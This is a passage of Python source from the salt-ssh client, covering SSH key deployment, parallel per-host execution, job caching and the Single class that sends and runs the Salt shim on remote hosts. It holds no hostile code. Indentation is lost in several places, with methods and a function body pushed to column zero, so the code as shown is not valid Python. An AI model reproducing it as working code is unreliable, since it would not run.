        if ret[host].get("stderr", "").count("Permission denied"):
            target = self.targets[host]
            # permission denied, attempt to auto deploy ssh key
            # (interactive: prompts on stdin for confirmation and password)
            print(
                "Permission denied for host {}, do you want to deploy "
                "the salt-ssh key? (password required):".format(host)
            )
            deploy = input("[Y/n] ")
            if deploy.startswith(("n", "N")):
                return ret
            target["passwd"] = getpass.getpass(
                "Password for {}@{}: ".format(target["user"], host)
            )
            return self._key_deploy_run(host, target, True)
        return ret
    def _key_deploy_run(self, host, target, re_run=True):
        """
        The ssh-copy-id routine

        :param host: target host id.
        :param target: the target's connection dict (user, passwd, ...).
        :param re_run: when True, re-run the original command after the key
            has been deployed and return its parsed result.
        """
        argv = [
            "ssh.set_auth_key",
            target.get("user", "root"),
            self.get_pubkey(),
        ]

        single = Single(
            self.opts,
            argv,
            host,
            mods=self.mods,
            fsclient=self.fsclient,
            thin=self.thin,
            **target
        )
        if salt.utils.path.which("ssh-copy-id"):
            # we have ssh-copy-id, use it!
            stdout, stderr, retcode = single.shell.copy_id()
        else:
            stdout, stderr, retcode = single.run()
        if re_run:
            # Drop the password so the re-run authenticates with the new key.
            target.pop("passwd")
            single = Single(
                self.opts,
                self.opts["argv"],
                host,
                mods=self.mods,
                fsclient=self.fsclient,
                thin=self.thin,
                **target
            )
            stdout, stderr, retcode = single.cmd_block()
            try:
                data = salt.utils.json.find_json(stdout)
                return {host: data.get("local", data)}
            except Exception:  # pylint: disable=broad-except
                # stdout was not parsable JSON; fall back to raw output.
                if stderr:
                    return {host: stderr}
                return {host: "Bad Return"}
        if salt.defaults.exitcodes.EX_OK != retcode:
            return {host: stderr}
        return {host: stdout}
    def handle_routine(self, que, opts, host, target, mine=False):
        """
        Run the routine in a "Thread", put a dict on the queue

        :param que: multiprocessing queue the {"id": ..., "ret": ...} result
            dict is pushed onto.
        :param opts: master opts (deep-copied so this routine cannot mutate
            the caller's copy).
        :param host: target host id.
        :param target: the target's connection dict.
        :param mine: whether to run as a mine call.
        """
        opts = copy.deepcopy(opts)
        single = Single(
            opts,
            opts["argv"],
            host,
            mods=self.mods,
            fsclient=self.fsclient,
            thin=self.thin,
            mine=mine,
            **target
        )
        ret = {"id": single.id}
        stdout, stderr, retcode = single.run()
        # This job is done, yield
        try:
            data = salt.utils.json.find_json(stdout)
            if len(data) < 2 and "local" in data:
                # A lone "local" key is a clean structured return.
                ret["ret"] = data["local"]
            else:
                ret["ret"] = {
                    "stdout": stdout,
                    "stderr": stderr,
                    "retcode": retcode,
                }
        except Exception:  # pylint: disable=broad-except
            # stdout was not parsable JSON; hand back the raw streams.
            ret["ret"] = {
                "stdout": stdout,
                "stderr": stderr,
                "retcode": retcode,
            }
        que.put(ret)
    def handle_ssh(self, mine=False):
        """
        Spin up the needed threads or processes and execute the subsequent
        routines

        Generator: yields {host: return} dicts as target processes finish.
        At most `ssh_max_procs` (default 25) routines run concurrently.
        """
        que = multiprocessing.Queue()
        running = {}
        target_iter = self.targets.__iter__()
        returned = set()  # hosts whose return has been yielded
        rets = set()      # hosts whose process has been joined
        init = False      # True once all targets have been started
        while True:
            if not self.targets:
                log.error("No matching targets found in roster.")
                break
            # Phase 1: start routines until the process cap is hit or the
            # target iterator is exhausted.
            if len(running) < self.opts.get("ssh_max_procs", 25) and not init:
                try:
                    host = next(target_iter)
                except StopIteration:
                    init = True
                    continue
                # Fill in per-target defaults for keys the roster omitted.
                for default in self.defaults:
                    if default not in self.targets[host]:
                        self.targets[host][default] = self.defaults[default]
                if "host" not in self.targets[host]:
                    self.targets[host]["host"] = host
                if self.targets[host].get("winrm") and not HAS_WINSHELL:
                    # winrm targets need the enterprise-only saltwinshell.
                    returned.add(host)
                    rets.add(host)
                    log_msg = (
                        "Please contact sales@saltstack.com for access to the"
                        " enterprise saltwinshell module."
                    )
                    log.debug(log_msg)
                    no_ret = {
                        "fun_args": [],
                        "jid": None,
                        "return": log_msg,
                        "retcode": 1,
                        "fun": "",
                        "id": host,
                    }
                    yield {host: no_ret}
                    continue
                args = (
                    que,
                    self.opts,
                    host,
                    self.targets[host],
                    mine,
                )
                routine = Process(target=self.handle_routine, args=args)
                routine.start()
                running[host] = {"thread": routine}
                continue
            # Phase 2: drain one queued return, if any.
            ret = {}
            try:
                ret = que.get(False)
                if "id" in ret:
                    returned.add(ret["id"])
                    yield {ret["id"]: ret["ret"]}
            except Exception:  # pylint: disable=broad-except
                # This bare exception is here to catch spurious exceptions
                # thrown by que.get during healthy operation. Please do not
                # worry about this bare exception, it is entirely here to
                # control program flow.
                pass
            # Phase 3: reap finished processes and surface missing returns.
            for host in running:
                if not running[host]["thread"].is_alive():
                    if host not in returned:
                        # Try to get any returns that came through since we
                        # last checked
                        try:
                            while True:
                                ret = que.get(False)
                                if "id" in ret:
                                    returned.add(ret["id"])
                                    yield {ret["id"]: ret["ret"]}
                        except Exception:  # pylint: disable=broad-except
                            pass

                    if host not in returned:
                        error = (
                            "Target '{}' did not return any data, "
                            "probably due to an error.".format(host)
                        )
                        ret = {"id": host, "ret": error}
                        log.error(error)
                        yield {ret["id"]: ret["ret"]}
                    running[host]["thread"].join()
                    rets.add(host)
            for host in rets:
                if host in running:
                    running.pop(host)
            if len(rets) >= len(self.targets):
                break
            # Sleep when limit or all threads started
            if len(running) >= self.opts.get("ssh_max_procs", 25) or len(
                self.targets
            ) >= len(running):
                time.sleep(0.1)
def run_iter(self, mine=False, jid=None):
    """
    Execute and yield returns as they come in, do not print to the display

    mine
        The Single objects will use mine_functions defined in the roster,
        pillar, or master config (they will be checked in that order) and
        will modify the argv with the arguments from mine_functions
    """
    # Ask the configured master job cache to generate (or validate) the jid
    fstr = "{}.prep_jid".format(self.opts["master_job_cache"])
    jid = self.returners[fstr](passed_jid=jid or self.opts.get("jid", None))

    # Save the invocation information
    argv = self.opts["argv"]

    if self.opts.get("raw_shell", False):
        fun = "ssh._raw"
        args = argv
    else:
        fun = argv[0] if argv else ""
        args = argv[1:]

    job_load = {
        "jid": jid,
        "tgt_type": self.tgt_type,
        "tgt": self.opts["tgt"],
        "user": self.opts["user"],
        "fun": fun,
        "arg": args,
    }

    # save load to the master job cache
    if self.opts["master_job_cache"] == "local_cache":
        # local_cache needs the minion list so it can pre-create result dirs
        self.returners["{}.save_load".format(self.opts["master_job_cache"])](
            jid, job_load, minions=self.targets.keys()
        )
    else:
        self.returners["{}.save_load".format(self.opts["master_job_cache"])](
            jid, job_load
        )

    # Stream per-host results as handle_ssh produces them
    for ret in self.handle_ssh(mine=mine):
        host = next(iter(ret.keys()))
        self.cache_job(jid, host, ret[host], fun)
        if self.event:
            # Normalize the payload before firing the job return event
            id_, data = next(iter(ret.items()))
            if isinstance(data, str):
                data = {"return": data}
            if "id" not in data:
                data["id"] = id_
            if "fun" not in data:
                data["fun"] = fun
            data[
                "jid"
            ] = jid  # make the jid in the payload the same as the jid in the tag
            self.event.fire_event(
                data, salt.utils.event.tagify([jid, "ret", host], "job")
            )
        yield ret
def cache_job(self, jid, id_, ret, fun):
    """
    Push a single host's return into the configured master job cache.
    """
    returner_name = "{}.returner".format(self.opts["master_job_cache"])
    payload = {"jid": jid, "id": id_, "return": ret, "fun": fun}
    self.returners[returner_name](payload)
def run(self, jid=None):
    """
    Execute the overall routine, print results via outputters

    When ``list_hosts`` is set, only print the parsed rosters and exit.
    Exits the process with EX_AGGREGATE if any host failed.
    """
    if self.opts.get("list_hosts"):
        self._get_roster()
        ret = {}
        for roster_file in self.__parsed_rosters:
            # Entries starting with "#" are roster-source markers, not files
            if roster_file.startswith("#"):
                continue
            ret[roster_file] = {}
            for host_id in self.__parsed_rosters[roster_file]:
                hostname = self.__parsed_rosters[roster_file][host_id]["host"]
                ret[roster_file][host_id] = hostname
        salt.output.display_output(ret, "nested", self.opts)
        sys.exit()

    fstr = "{}.prep_jid".format(self.opts["master_job_cache"])
    jid = self.returners[fstr](passed_jid=jid or self.opts.get("jid", None))

    # Save the invocation information
    argv = self.opts["argv"]

    if self.opts.get("raw_shell", False):
        fun = "ssh._raw"
        args = argv
    else:
        fun = argv[0] if argv else ""
        args = argv[1:]

    job_load = {
        "jid": jid,
        "tgt_type": self.tgt_type,
        "tgt": self.opts["tgt"],
        "user": self.opts["user"],
        "fun": fun,
        "arg": args,
    }

    # save load to the master job cache; failure to save is logged but
    # does not abort the run
    try:
        if isinstance(jid, bytes):
            jid = jid.decode("utf-8")
        if self.opts["master_job_cache"] == "local_cache":
            self.returners["{}.save_load".format(self.opts["master_job_cache"])](
                jid, job_load, minions=self.targets.keys()
            )
        else:
            self.returners["{}.save_load".format(self.opts["master_job_cache"])](
                jid, job_load
            )
    except Exception as exc:  # pylint: disable=broad-except
        log.error(
            "Could not save load with returner %s: %s",
            self.opts["master_job_cache"],
            exc,
            exc_info=True,
        )

    if self.opts.get("verbose"):
        msg = "Executing job with jid {}".format(jid)
        print(msg)
        print("-" * len(msg) + "\n")
        print("")
    sret = {}
    outputter = self.opts.get("output", "nested")
    final_exit = 0
    for ret in self.handle_ssh():
        host = next(iter(ret.keys()))
        # Any non-dict return or nonzero retcode marks the whole run failed
        if isinstance(ret[host], dict):
            host_ret = ret[host].get("retcode", 0)
            if host_ret != 0:
                final_exit = 1
        else:
            # Error on host
            final_exit = 1

        self.cache_job(jid, host, ret[host], fun)
        ret = self.key_deploy(host, ret)

        # Collapse pure ssh transport errors down to the stderr string
        if isinstance(ret[host], dict) and (
            ret[host].get("stderr") or ""
        ).startswith("ssh:"):
            ret[host] = ret[host]["stderr"]

        if not isinstance(ret[host], dict):
            p_data = {host: ret[host]}
        elif "return" not in ret[host]:
            p_data = ret
        else:
            outputter = ret[host].get("out", self.opts.get("output", "nested"))
            p_data = {host: ret[host].get("return", {})}
        if self.opts.get("static"):
            # static mode: accumulate and display everything at the end
            sret.update(p_data)
        else:
            salt.output.display_output(p_data, outputter, self.opts)
        if self.event:
            id_, data = next(iter(ret.items()))
            if isinstance(data, str):
                data = {"return": data}
            if "id" not in data:
                data["id"] = id_
            if "fun" not in data:
                data["fun"] = fun
            data[
                "jid"
            ] = jid  # make the jid in the payload the same as the jid in the tag
            self.event.fire_event(
                data, salt.utils.event.tagify([jid, "ret", host], "job")
            )
    if self.event is not None:
        self.event.destroy()
    if self.opts.get("static"):
        salt.output.display_output(sret, outputter, self.opts)
    if final_exit:
        sys.exit(salt.defaults.exitcodes.EX_AGGREGATE)
class Single:
"""
Hold onto a single ssh execution
"""
# 1. Get command ready
# 2. Check if target has salt
# 3. deploy salt-thin
# 4. execute requested command via salt-thin
def __init__(
    self,
    opts,
    argv,
    id_,
    host,
    user=None,
    port=None,
    passwd=None,
    priv=None,
    priv_passwd=None,
    timeout=30,
    sudo=False,
    tty=False,
    mods=None,
    fsclient=None,
    thin=None,
    mine=False,
    minion_opts=None,
    identities_only=False,
    sudo_user=None,
    remote_port_forwards=None,
    winrm=False,
    ssh_options=None,
    **kwargs
):
    """
    Set up a single ssh execution target.

    opts: master configuration dict
    argv: command to execute, as a list (a bare string is wrapped in one)
    id_: minion id as defined in the roster
    host: hostname/address to connect to
    Remaining keyword arguments are connection/roster options; unknown
    kwargs are folded into ``self.target`` and forwarded to the shell.
    """
    # Get mine setting and mine_functions if defined in kwargs (from roster)
    self.mine = mine
    self.mine_functions = kwargs.get("mine_functions")
    self.cmd_umask = kwargs.get("cmd_umask", None)
    self.winrm = winrm
    self.opts = opts
    self.tty = tty
    # wipe: remove the thin dir from the target after execution unless
    # the roster explicitly disables it
    if kwargs.get("disable_wipe"):
        self.wipe = False
    else:
        self.wipe = bool(self.opts.get("ssh_wipe"))
    if kwargs.get("thin_dir"):
        self.thin_dir = kwargs["thin_dir"]
    elif self.winrm:
        # Windows targets get their paths from saltwinshell
        saltwinshell.set_winvars(self)
        self.python_env = kwargs.get("ssh_python_env")
    else:
        if user:
            thin_dir = DEFAULT_THIN_DIR.replace("%%USER%%", user)
        else:
            thin_dir = DEFAULT_THIN_DIR.replace("%%USER%%", "root")
        # Make the thin dir unique per master by hashing the master FQDN
        self.thin_dir = thin_dir.replace(
            "%%FQDNUUID%%",
            uuid.uuid3(uuid.NAMESPACE_DNS, salt.utils.network.get_fqhostname()).hex[
                :6
            ],
        )
    self.opts["thin_dir"] = self.thin_dir
    self.fsclient = fsclient
    self.context = {"master_opts": self.opts, "fileclient": self.fsclient}

    self.ssh_pre_flight = kwargs.get("ssh_pre_flight", None)

    if self.ssh_pre_flight:
        self.ssh_pre_file = os.path.basename(self.ssh_pre_flight)

    if isinstance(argv, str):
        self.argv = [argv]
    else:
        self.argv = argv

    self.fun, self.args, self.kwargs = self.__arg_comps()
    self.id = id_
    self.set_path = kwargs.get("set_path", "")

    self.mods = mods if isinstance(mods, dict) else {}
    # Connection arguments handed to the shell factory below
    args = {
        "host": host,
        "user": user,
        "port": port,
        "passwd": passwd,
        "priv": priv,
        "priv_passwd": priv_passwd,
        "timeout": timeout,
        "sudo": sudo,
        "tty": tty,
        "mods": self.mods,
        "identities_only": identities_only,
        "sudo_user": sudo_user,
        "remote_port_forwards": remote_port_forwards,
        "winrm": winrm,
        "ssh_options": ssh_options,
    }
    # Pre apply changeable defaults
    self.minion_opts = {
        "grains_cache": True,
        "log_file": "salt-call.log",
    }
    self.minion_opts.update(opts.get("ssh_minion_opts", {}))
    if minion_opts is not None:
        self.minion_opts.update(minion_opts)
    # Post apply system needed defaults
    self.minion_opts.update(
        {
            "root_dir": os.path.join(self.thin_dir, "running_data"),
            "id": self.id,
            "sock_dir": "/",
            "fileserver_list_cache_time": 3,
        }
    )
    self.minion_config = salt.serializers.yaml.serialize(self.minion_opts)
    self.target = kwargs
    self.target.update(args)
    self.serial = salt.payload.Serial(opts)
    self.wfuncs = salt.loader.ssh_wrapper(opts, None, self.context)
    self.shell = salt.client.ssh.shell.gen_shell(opts, **args)
    if self.winrm:
        # Determine if Windows client is x86 or AMD64
        arch, _, _ = self.shell.exec_cmd("powershell $ENV:PROCESSOR_ARCHITECTURE")
        self.arch = arch.strip()
    self.thin = thin if thin else salt.utils.thin.thin_path(opts["cachedir"])
def __arg_comps(self):
    """
    Split self.argv into its components: the function name, the
    positional arguments, and the keyword arguments.
    """
    if not self.argv:
        return "", [], {}
    fun = self.argv[0]
    pos_args, kw_args = salt.utils.args.parse_input(
        self.argv[1:], condition=False, no_parse=self.opts.get("no_parse", [])
    )
    return fun, pos_args, kw_args
def _escape_arg(self, arg):
"""
Properly escape argument to protect special characters from shell
interpretation. This avoids having to do tricky argument quoting.
Effectively just escape all characters in the argument that are not
alphanumeric!
"""
if self.winrm:
return arg
return "".join(["\\" + char if re.match(r"\W", char) else char for char in arg])
def run_ssh_pre_flight(self):
    """
    Copy the configured ssh_pre_flight script to the target's temp
    directory and execute it there before any other ssh command runs.
    """
    remote_script = os.path.join(tempfile.gettempdir(), self.ssh_pre_file)
    self.shell.send(self.ssh_pre_flight, remote_script)
    return self.execute_script(remote_script)
def check_thin_dir(self):
    """
    Return True if the thin dir already exists on the remote machine.
    """
    _stdout, _stderr, retcode = self.shell.exec_cmd(
        "test -d {}".format(self.thin_dir)
    )
    # `test -d` exits 0 only when the directory exists
    return retcode == 0
def deploy(self):
    """
    Deploy the salt-thin tarball to the target, then any ext mods.
    """
    destination = os.path.join(self.thin_dir, "salt-thin.tgz")
    self.shell.send(self.thin, destination)
    self.deploy_ext()
    return True
def deploy_ext(self):
    """
    Deploy the ext_mods tarball to the target, if one was built.
    """
    ext_tarball = self.mods.get("file")
    if ext_tarball:
        self.shell.send(
            ext_tarball,
            os.path.join(self.thin_dir, "salt-ext_mods.tgz"),
        )
    return True
def run(self, deploy_attempted=False):
    """
    Execute the routine, the routine can be either:
    1. Execute a raw shell command
    2. Execute a wrapper func
    3. Execute a remote Salt command

    If a (re)deploy is needed, then retry the operation after a deploy
    attempt

    Returns tuple of (stdout, stderr, retcode)
    """
    stdout = stderr = retcode = None

    if self.ssh_pre_flight:
        # Skip the pre-flight script when the thin dir already exists,
        # unless ssh_run_pre_flight forces it to run every time
        if not self.opts.get("ssh_run_pre_flight", False) and self.check_thin_dir():
            log.info(
                "%s thin dir already exists. Not running ssh_pre_flight script",
                self.thin_dir,
            )
        elif not os.path.exists(self.ssh_pre_flight):
            log.error(
                "The ssh_pre_flight script %s does not exist", self.ssh_pre_flight
            )
        else:
            stdout, stderr, retcode = self.run_ssh_pre_flight()
            if retcode != 0:
                # Abort the whole run if the pre-flight script failed
                log.error(
                    "Error running ssh_pre_flight script %s", self.ssh_pre_file
                )
                return stdout, stderr, retcode
            log.info(
                "Successfully ran the ssh_pre_flight script: %s", self.ssh_pre_file
            )

    if self.opts.get("raw_shell", False):
        cmd_str = " ".join([self._escape_arg(arg) for arg in self.argv])
        stdout, stderr, retcode = self.shell.exec_cmd(cmd_str)

    elif self.fun in self.wfuncs or self.mine:
        # Wrapper functions run on the master; they return no stderr
        stdout, retcode = self.run_wfunc()

    else:
        stdout, stderr, retcode = self.cmd_block()

    return stdout, stderr, retcode
def run_wfunc(self):
    """
    Execute a wrapper function

    Returns tuple of (json_data, retcode)
    """
    # Ensure that opts/grains are up to date
    # Execute routine
    data_cache = False
    data = None
    cdir = os.path.join(self.opts["cachedir"], "minions", self.id)
    if not os.path.isdir(cdir):
        os.makedirs(cdir)
    datap = os.path.join(cdir, "ssh_data.p")
    refresh = False
    if not os.path.isfile(datap):
        refresh = True
    else:
        passed_time = (time.time() - os.stat(datap).st_mtime) / 60
        if passed_time > self.opts.get("cache_life", 60):
            refresh = True

    if self.opts.get("refresh_cache"):
        refresh = True
    conf_grains = {}
    # Save conf file grains before they get clobbered
    if "ssh_grains" in self.opts:
        conf_grains = self.opts["ssh_grains"]
    # NOTE: data_cache is hard-coded False above, so refresh is always
    # forced and the datap cache below is never written or read
    if not data_cache:
        refresh = True
    if refresh:
        # Make the datap
        # TODO: Auto expire the datap
        pre_wrapper = salt.client.ssh.wrapper.FunctionWrapper(
            self.opts,
            self.id,
            fsclient=self.fsclient,
            minion_opts=self.minion_opts,
            **self.target
        )

        opts_pkg = pre_wrapper["test.opts_pkg"]()  # pylint: disable=E1102
        if "_error" in opts_pkg:
            # Refresh failed
            retcode = opts_pkg["retcode"]
            ret = salt.utils.json.dumps({"local": opts_pkg})
            return ret, retcode

        opts_pkg["file_roots"] = self.opts["file_roots"]
        opts_pkg["pillar_roots"] = self.opts["pillar_roots"]
        opts_pkg["ext_pillar"] = self.opts["ext_pillar"]
        opts_pkg["extension_modules"] = self.opts["extension_modules"]
        opts_pkg["module_dirs"] = self.opts["module_dirs"]
        opts_pkg["_ssh_version"] = self.opts["_ssh_version"]
        opts_pkg["thin_dir"] = self.opts["thin_dir"]
        opts_pkg["master_tops"] = self.opts["master_tops"]
        opts_pkg["__master_opts__"] = self.context["master_opts"]
        if "known_hosts_file" in self.opts:
            opts_pkg["known_hosts_file"] = self.opts["known_hosts_file"]
        if "_caller_cachedir" in self.opts:
            opts_pkg["_caller_cachedir"] = self.opts["_caller_cachedir"]
        else:
            opts_pkg["_caller_cachedir"] = self.opts["cachedir"]
        # Use the ID defined in the roster file
        opts_pkg["id"] = self.id

        retcode = 0

        # Restore master grains
        for grain in conf_grains:
            opts_pkg["grains"][grain] = conf_grains[grain]
        # Enable roster grains support
        if "grains" in self.target:
            for grain in self.target["grains"]:
                opts_pkg["grains"][grain] = self.target["grains"][grain]

        # Compile pillar against master opts merged with the target opts
        popts = {}
        popts.update(opts_pkg["__master_opts__"])
        popts.update(opts_pkg)
        pillar = salt.pillar.Pillar(
            popts,
            opts_pkg["grains"],
            opts_pkg["id"],
            opts_pkg.get("saltenv", "base"),
        )
        pillar_data = pillar.compile_pillar()

        # TODO: cache minion opts in datap in master.py
        data = {
            "opts": opts_pkg,
            "grains": opts_pkg["grains"],
            "pillar": pillar_data,
        }
        if data_cache:
            with salt.utils.files.fopen(datap, "w+b") as fp_:
                fp_.write(self.serial.dumps(data))
    if not data and data_cache:
        with salt.utils.files.fopen(datap, "rb") as fp_:
            data = self.serial.load(fp_)
    opts = data.get("opts", {})
    opts["grains"] = data.get("grains")

    # Restore master grains
    for grain in conf_grains:
        opts["grains"][grain] = conf_grains[grain]
    # Enable roster grains support
    if "grains" in self.target:
        for grain in self.target["grains"]:
            opts["grains"][grain] = self.target["grains"][grain]

    opts["pillar"] = data.get("pillar")
    wrapper = salt.client.ssh.wrapper.FunctionWrapper(
        opts,
        self.id,
        fsclient=self.fsclient,
        minion_opts=self.minion_opts,
        **self.target
    )
    wrapper.fsclient.opts["cachedir"] = opts["cachedir"]
    self.wfuncs = salt.loader.ssh_wrapper(opts, wrapper, self.context)
    wrapper.wfuncs = self.wfuncs

    # We're running in the mine, need to fetch the arguments from the
    # roster, pillar, master config (in that order)
    if self.mine:
        mine_args = None
        mine_fun_data = None
        mine_fun = self.fun

        if self.mine_functions and self.fun in self.mine_functions:
            mine_fun_data = self.mine_functions[self.fun]
        elif opts["pillar"] and self.fun in opts["pillar"].get(
            "mine_functions", {}
        ):
            mine_fun_data = opts["pillar"]["mine_functions"][self.fun]
        elif self.fun in self.context["master_opts"].get("mine_functions", {}):
            mine_fun_data = self.context["master_opts"]["mine_functions"][self.fun]

        if isinstance(mine_fun_data, dict):
            mine_fun = mine_fun_data.pop("mine_function", mine_fun)
            mine_args = mine_fun_data
        elif isinstance(mine_fun_data, list):
            # A list entry may carry the real function name in a dict item
            for item in mine_fun_data[:]:
                if isinstance(item, dict) and "mine_function" in item:
                    mine_fun = item["mine_function"]
                    mine_fun_data.pop(mine_fun_data.index(item))
            mine_args = mine_fun_data
        else:
            mine_args = mine_fun_data

        # If we found mine_args, replace our command's args
        if isinstance(mine_args, dict):
            self.args = []
            self.kwargs = mine_args
        elif isinstance(mine_args, list):
            self.args = mine_args
            self.kwargs = {}

    try:
        if self.mine:
            result = wrapper[mine_fun](*self.args, **self.kwargs)
        else:
            result = self.wfuncs[self.fun](*self.args, **self.kwargs)
    except TypeError as exc:
        result = "TypeError encountered executing {}: {}".format(self.fun, exc)
        log.error(result, exc_info_on_loglevel=logging.DEBUG)
        retcode = 1
    except Exception as exc:  # pylint: disable=broad-except
        result = "An Exception occurred while executing {}: {}".format(
            self.fun, exc
        )
        log.error(result, exc_info_on_loglevel=logging.DEBUG)
        retcode = 1
    # Mimic the json data-structure that "salt-call --local" will
    # emit (as seen in ssh_py_shim.py)
    if isinstance(result, dict) and "local" in result:
        ret = salt.utils.json.dumps({"local": result["local"]})
    else:
        ret = salt.utils.json.dumps({"local": {"return": result}})
    return ret, retcode
def _cmd_str(self):
    """
    Prepare the command string

    Builds the python shim options block, embeds it (base64-encoded)
    into the sh shim (or the winrm shim on Windows) and returns the
    final command line to run on the target.
    """
    sudo = "sudo" if self.target["sudo"] else ""
    sudo_user = self.target["sudo_user"]
    if "_caller_cachedir" in self.opts:
        cachedir = self.opts["_caller_cachedir"]
    else:
        cachedir = self.opts["cachedir"]
    thin_code_digest, thin_sum = salt.utils.thin.thin_sum(cachedir, "sha1")
    debug = ""
    if not self.opts.get("log_level"):
        self.opts["log_level"] = "info"
    if (
        salt.log.LOG_LEVELS["debug"]
        >= salt.log.LOG_LEVELS[self.opts.get("log_level", "info")]
    ):
        debug = "1"
    # This literal is substituted into ssh_py_shim.py in place of the
    # "#%%OPTS" marker; its lines must stay flush-left so the resulting
    # python source is valid at module level.
    arg_str = '''
OPTIONS.config = \
"""
{config}
"""
OPTIONS.delimiter = '{delimeter}'
OPTIONS.saltdir = '{saltdir}'
OPTIONS.checksum = '{checksum}'
OPTIONS.hashfunc = '{hashfunc}'
OPTIONS.version = '{version}'
OPTIONS.ext_mods = '{ext_mods}'
OPTIONS.wipe = {wipe}
OPTIONS.tty = {tty}
OPTIONS.cmd_umask = {cmd_umask}
OPTIONS.code_checksum = {code_checksum}
ARGS = {arguments}\n'''.format(
        config=self.minion_config,
        delimeter=RSTR,
        saltdir=self.thin_dir,
        checksum=thin_sum,
        hashfunc="sha1",
        version=salt.version.__version__,
        ext_mods=self.mods.get("version", ""),
        wipe=self.wipe,
        tty=self.tty,
        cmd_umask=self.cmd_umask,
        code_checksum=thin_code_digest,
        arguments=self.argv,
    )
    py_code = SSH_PY_SHIM.replace("#%%OPTS", arg_str)
    py_code_enc = base64.encodebytes(py_code.encode("utf-8")).decode("utf-8")
    if not self.winrm:
        cmd = SSH_SH_SHIM.format(
            DEBUG=debug,
            SUDO=sudo,
            SUDO_USER=sudo_user,
            SSH_PY_CODE=py_code_enc,
            HOST_PY_MAJOR=sys.version_info[0],
            SET_PATH=self.set_path,
        )
    else:
        cmd = saltwinshell.gen_shim(py_code_enc)
    return cmd
def execute_script(self, script, extension="py", pre_dir=""):
    """
    Execute a script on the minion, then delete it from the target.
    """
    if extension == "ps1":
        ret = self.shell.exec_cmd('"powershell {}"'.format(script))
    elif not self.winrm:
        ret = self.shell.exec_cmd("/bin/sh '{}{}'".format(pre_dir, script))
    else:
        ret = saltwinshell.call_python(self, script)

    # Remove file from target system
    if self.winrm:
        self.shell.exec_cmd("del {}".format(script))
    else:
        self.shell.exec_cmd("rm '{}{}'".format(pre_dir, script))

    return ret
def shim_cmd(self, cmd_str, extension="py"):
    """
    Run a shim command.

    If tty is enabled, we must scp the shim to the target system and
    execute it there
    """
    if not self.tty and not self.winrm:
        # Fast path: pipe the shim straight over ssh
        return self.shell.exec_cmd(cmd_str)

    # Write the shim to a temporary file in the default temp directory
    with tempfile.NamedTemporaryFile(
        mode="w+b", prefix="shim_", delete=False
    ) as shim_tmp_file:
        shim_tmp_file.write(salt.utils.stringutils.to_bytes(cmd_str))

    # Copy shim to target system, under $HOME/.<randomized name>
    target_shim_file = ".{}.{}".format(
        binascii.hexlify(os.urandom(6)).decode("ascii"), extension
    )
    if self.winrm:
        target_shim_file = saltwinshell.get_target_shim_file(self, target_shim_file)
    self.shell.send(shim_tmp_file.name, target_shim_file, makedirs=True)

    # Remove our shim file (best effort; the target copy is what matters)
    try:
        os.remove(shim_tmp_file.name)
    except OSError:
        pass

    # Execute shim
    ret = self.execute_script(script=target_shim_file, extension=extension)
    return ret
def cmd_block(self, is_retry=False):
    """
    Prepare the pre-check command to send to the subsystem

    1. execute SHIM + command
    2. check if SHIM returns a master request or if it completed
    3. handle any master request
    4. re-execute SHIM + command
    5. split SHIM results from command results
    6. return command results

    Returns tuple of (stdout, stderr, retcode). The RSTR delimiter
    separates shim output from salt output; the re.split loops below
    strip everything up to and including the last delimiter.
    """
    self.argv = _convert_args(self.argv)
    log.debug(
        "Performing shimmed, blocking command as follows:\n%s",
        " ".join([str(arg) for arg in self.argv]),
    )
    cmd_str = self._cmd_str()
    stdout, stderr, retcode = self.shim_cmd(cmd_str)

    log.trace("STDOUT %s\n%s", self.target["host"], stdout)
    log.trace("STDERR %s\n%s", self.target["host"], stderr)
    log.debug("RETCODE %s: %s", self.target["host"], retcode)

    error = self.categorize_shim_errors(stdout, stderr, retcode)
    if error:
        if error == "Python environment not found on Windows system":
            saltwinshell.deploy_python(self)
            stdout, stderr, retcode = self.shim_cmd(cmd_str)
            while re.search(RSTR_RE, stdout):
                stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
            while re.search(RSTR_RE, stderr):
                stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
        elif error == "Undefined SHIM state":
            self.deploy()
            stdout, stderr, retcode = self.shim_cmd(cmd_str)
            if not re.search(RSTR_RE, stdout) or not re.search(RSTR_RE, stderr):
                # If RSTR is not seen in both stdout and stderr then there
                # was a thin deployment problem.
                return (
                    "ERROR: Failure deploying thin, undefined state: {}".format(
                        stdout
                    ),
                    stderr,
                    retcode,
                )
            while re.search(RSTR_RE, stdout):
                stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
            while re.search(RSTR_RE, stderr):
                stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
        else:
            return "ERROR: {}".format(error), stderr, retcode

    # FIXME: this discards output from ssh_shim if the shim succeeds. It should
    # always save the shim output regardless of shim success or failure.
    while re.search(RSTR_RE, stdout):
        stdout = re.split(RSTR_RE, stdout, 1)[1].strip()

    if re.search(RSTR_RE, stderr):
        # Found RSTR in stderr which means SHIM completed and only
        # and remaining output is only from salt.
        while re.search(RSTR_RE, stderr):
            stderr = re.split(RSTR_RE, stderr, 1)[1].strip()

    else:
        # RSTR was found in stdout but not stderr - which means there
        # is a SHIM command for the master.
        shim_command = re.split(r"\r?\n", stdout, 1)[0].strip()
        log.debug("SHIM retcode(%s) and command: %s", retcode, shim_command)
        if (
            "deploy" == shim_command
            and retcode == salt.defaults.exitcodes.EX_THIN_DEPLOY
        ):
            self.deploy()
            stdout, stderr, retcode = self.shim_cmd(cmd_str)
            if not re.search(RSTR_RE, stdout) or not re.search(RSTR_RE, stderr):
                if not self.tty:
                    # If RSTR is not seen in both stdout and stderr then there
                    # was a thin deployment problem.
                    log.error(
                        "ERROR: Failure deploying thin, retrying:\n"
                        "STDOUT:\n%s\nSTDERR:\n%s\nRETCODE: %s",
                        stdout,
                        stderr,
                        retcode,
                    )
                    return self.cmd_block()
                elif not re.search(RSTR_RE, stdout):
                    # If RSTR is not seen in stdout with tty, then there
                    # was a thin deployment problem.
                    log.error(
                        "ERROR: Failure deploying thin, retrying:\n"
                        "STDOUT:\n%s\nSTDERR:\n%s\nRETCODE: %s",
                        stdout,
                        stderr,
                        retcode,
                    )
            while re.search(RSTR_RE, stdout):
                stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
            if self.tty:
                # tty mode multiplexes everything onto stdout
                stderr = ""
            else:
                while re.search(RSTR_RE, stderr):
                    stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
        elif "ext_mods" == shim_command:
            self.deploy_ext()
